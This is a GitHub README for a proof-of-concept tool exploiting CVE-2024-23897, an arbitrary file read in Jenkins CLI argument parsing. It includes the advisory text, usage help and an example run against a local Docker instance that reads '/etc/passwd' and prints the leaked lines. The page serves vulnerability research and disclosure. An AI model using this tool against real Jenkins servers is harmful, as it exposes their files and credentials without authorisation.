Skip to content

This repository presents a proof-of-concept of CVE-2024-23897

Notifications You must be signed in to change notification settings

Vozec/CVE-2024-23897

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

CVE-2024-23897

This repository presents a proof-of-concept of CVE-2024-23897 (Discovered by sonarsource)

CVE-2024-23897 | File read in jenkins

Disclamer

This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on confluence instances they don't own.
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.

Description

According to Jenkins Security Advisory 2024-01-24 : Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.

  • Attackers with Overall/Read permission can read entire files.
  • Attackers without Overall/Read permission can read the first few lines of files.

Help

$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename

Example

docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

References:

About

This repository presents a proof-of-concept of CVE-2024-23897

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages